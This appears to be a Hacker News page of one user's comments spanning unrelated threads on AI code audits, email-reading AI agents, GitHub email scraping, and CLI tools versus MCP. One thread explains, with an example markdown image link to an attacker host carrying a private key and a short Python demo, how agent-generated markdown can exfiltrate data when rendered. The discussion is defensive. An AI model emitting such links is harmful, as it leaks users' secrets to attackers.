Hacker News | eli's comments

It depends whether anyone was ever actually going to spend that week doing it the "hard" way. Having Claude do it in a few minutes beats doing nothing.

Put another way: I absolutely would have an intern work on a security audit. I would not have an intern replace a professional audit though.

It's otherwise a pretty low stakes use. I'd expect false positives to be pretty obvious to someone maintaining the code.


My point is that it’s one thing to say I want my intern to start doing a security audit.

It’s another thing to say hey intern security audit this entire code base.

LLMs thrive on context. You need the right context at the right time; it doesn't matter how good your model is if you don't have that.


Why would a tool that works need to dissuade skeptics from trying it?

Based on his twitter he may just like irony/meta posting a little too much like a lot of modern culture

Neither side wants that so seems pretty unlikely

You still have to trust your executive assistant. I would never give someone I don't trust the ability to read and write emails for me.

If this takes off, I wonder if platforms will start providing API tokens scoped for assistants. They would have permissions for non-destructive actions like reading mail, flagging important mail, creating drafts, and moving messages to trash, but nothing more.
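No platform offers such assistant-scoped tokens today, so this is purely a sketch of the idea: a default-deny permission map where only non-destructive, non-exfiltrating actions are granted. All scope names are illustrative, not a real API.

```python
# Hypothetical assistant-scoped token: non-destructive email actions only.
# Scope names are illustrative; no real platform API is assumed.
ASSISTANT_SCOPES = {
    "mail.read": True,       # reading mail
    "mail.flag": True,       # flagging important mail
    "drafts.create": True,   # creating drafts (a human still hits send)
    "mail.trash": True,      # moving to trash is reversible
    "mail.send": False,      # sending is an exfiltration channel
    "mail.purge": False,     # destructive, not reversible
}

def allowed(action: str) -> bool:
    """Default-deny: anything not explicitly granted is refused."""
    return ASSISTANT_SCOPES.get(action, False)

print(allowed("drafts.create"), allowed("mail.send"))  # True False
```

The key design choice is default-deny: an action the platform later adds (and the scope map has never heard of) stays blocked rather than silently allowed.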

How does my email platform know which messages I want my agent to see and which are too sensitive?

I don't see how it's possible to securely give an agent access to your inbox unless it has zero ability to exfiltrate (not sending mail, not making any external network requests). Even then, you need to be careful with artifacts generated by the agent because a markdown file could transmit data when rendered.


> a markdown file could transmit data when rendered.

This is a new threat vector to me. Can you tell me more?


Your markdown file has an image that links to another server controlled by the attacker and the path/query parameters you're attempting to render contains sensitive data.

    ![](https://the-attacker.com/steal?private-key=abc123def)
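To make the mechanism concrete, here's a minimal sketch (reusing the example attacker URL above) of what happens at render time: a standard renderer turns the image reference into an `<img>` tag, and the viewer's browser fetches that URL with no user action, so the query string leaves the machine.

```python
import re
from urllib.parse import urlparse, parse_qs

# Agent-generated markdown containing an injected image reference.
agent_markdown = (
    "Inbox summary...\n"
    "![](https://the-attacker.com/steal?private-key=abc123def)"
)

# A renderer converts ![](url) into <img src="url">; the browser then
# requests that URL automatically, leaking the query parameters to the
# attacker's server. Here we just extract what would be leaked.
url = re.search(r"!\[[^\]]*\]\(([^)]+)\)", agent_markdown).group(1)
leaked = parse_qs(urlparse(url).query)
print(leaked)  # {'private-key': ['abc123def']}
```

This is why "the agent can only write files" is not a safe boundary: any file format that gets rendered with network access (markdown, HTML email, SVG) is a potential exfiltration channel.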


Yes. It’s kind of like giving power of attorney to Jeffrey Epstein.

Seems to be working out alright for old Wexner.

How would you know whether the account that did the scraping was banned?

By visiting the account and noticing that it still has activity long after the report.

I'm confused. How do you know what account scraped your email address from github in order to send you an email?

Or do you mean going after the accounts of companies that make use of a likely scraped email address? That's not a bad idea either, but it has risks and isn't the same thing.


Half the time they literally say it in the email. I just looked in my spam folder and just a few hours ago got an email titled "Your profile: Github", that started with:

> I came across your profile on GitHub. Given you're based in the US, I thought it might be relevant to reach out.
>
> Profile: https://github.com/tedivm

They aren't doing anything to hide it.


But hold on.

They could have git cloned your repo, used or otherwise analyzed your code which follows TOS then used the local git repo to pull your email address.

How is GitHub responsible here?


They could have, but it seems unlikely they targeted one or two repos and probably cloned thousands or more.

That identifies the company that sent the email, not the GitHub account that scraped it.

How do you propose GH take action without risking taking down legitimate projects due to brigades of false reports?

GH literally say in a parent comment:

> we can (and do) take action against those accounts including banning the accounts


That they use some of their trillion dollar marketshare to solve it, why are you acting like this is a hard problem? It's not. They're just too cheap and greedy to do anything about it.

Trillion dollar marketshare? How big do you think GitHub is?

GitHub is wholly owned by Microsoft, which has a 3 trillion market cap

When I left, GH was valued at around $40 billion, above the $8B they were purchased for and well below the $1T that is claimed.

Even if they were valued at around $100 million they would still have more than enough resources to solve this problem. Stop excusing companies that hate hiring people and are so greedy they would rather punt this problem to the commons, fucking over an entire community that literally enabled them to exist.

Come on here, even Meta hires people in Kenya to look at CP and snuff films to label this stuff. Meta! They literally profited off of a genocide and they still know how to do this.

Excuse after excuse for these greedy companies.


One would expect people on Hacker News to know that a single business division doesn't have direct access to the funds of other business divisions of the same corporation.

One would expect people on HN to know that companies subsidize failing BUs with their profitable BUs all the time.

Sorry but why are you making excuses for these insanely greedy companies that don't want to hire people to solve a basic problem?


How small do you think Microsoft is??!

GitHub is not all of Microsoft.

I have never had a problem using CLI tools instead of MCP. If you add a little list of the available tools to the context it's nearly the same thing, with the added benefit of e.g. being able to chain multiple tools together in one call.

Not doubting you, just sharing my experience: I got a dramatically better experience with MCP for multi-step workflows that involve feedback from SQL compilers. The right harness could probably get the same performance with the right tools around the API calls, but it was easier for me to stop fighting it.

Did you test actually having command-line tools that give you the same interface as the MCPs? Because that is generally what people are recommending as the alternative, not letting the agent grapple with <random tool> that returns poorly structured data.

If your options are a "compileSQL" MCP tool and a "compileSQL" CLI tool that both return the same data as JSON, the agent will know how to e.g. chain jq, head, and grep to extract a subset from the latter in one step, but will need multiple steps with the MCP tool.

The effect compounds. E.g. let's say you have a "generateQuery" tool vs CLI. In the CLI case, you might get it piping the output from one through assorted operations and then straight into the other. I'm sure agents will eventually support creating pipelines of MCP tools as well, but you can get those benefits today if you have the agents write CLIs instead of bothering with MCP servers.

I've for that matter had to replace MCP servers with scripts that Claude one-shotted because the MCP servers lacked functionality... It's much more flexible.
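As a rough sketch of why the CLI path saves round trips: a CLI that emits JSON can be run and filtered in the same step, whereas an MCP tool call returns the whole blob to the model and needs a follow-up step to narrow it. The "compileSQL" tool here is faked inline purely for illustration; no real compiler is assumed.

```python
import json
import subprocess
import sys

# Stand-in for a hypothetical "compileSQL" CLI that prints JSON diagnostics.
# (Faked with an inline Python one-liner so the sketch is self-contained.)
fake_cli = [sys.executable, "-c",
            "import json; print(json.dumps("
            "{'errors': [{'line': 3, 'msg': 'unknown column'}], "
            "'warnings': []}))"]

# CLI path: run the tool and extract just the subset of interest in one
# step -- the in-process equivalent of `compileSQL ... | jq .errors`.
out = subprocess.run(fake_cli, capture_output=True, text=True,
                     check=True).stdout
errors = json.loads(out)["errors"]
print(errors)  # [{'line': 3, 'msg': 'unknown column'}]
```

An MCP equivalent would hand the full diagnostics object back into the model's context and require another tool call (or more tokens) to get down to just the errors.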


That's just because they're relatively inexpensive

Not all that different from Musk buying Twitter. Happens pretty often with private equity as a buyer.

Is it also possible that crackme solutions were already in the training data?


I used the latest submissions from sites like crackmes.one, which were days or weeks old, to guard against that.


I’m not sure it’s possible to conclude what he actually believes from public statements. I do not trust him to tell the truth about anything related to AI.

